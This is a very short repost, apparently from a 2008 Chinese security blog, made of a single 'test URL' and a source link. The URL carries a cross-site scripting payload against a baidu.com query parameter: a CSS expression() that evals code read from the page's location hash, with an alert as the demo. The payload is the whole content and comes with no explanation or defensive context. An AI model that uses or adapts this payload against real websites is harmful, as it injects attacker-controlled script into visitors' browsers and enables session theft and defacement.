http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29
Test URL:
Reposted from: https://www.cnblogs.com/Safe3/archive/2008/07/10/1239966.html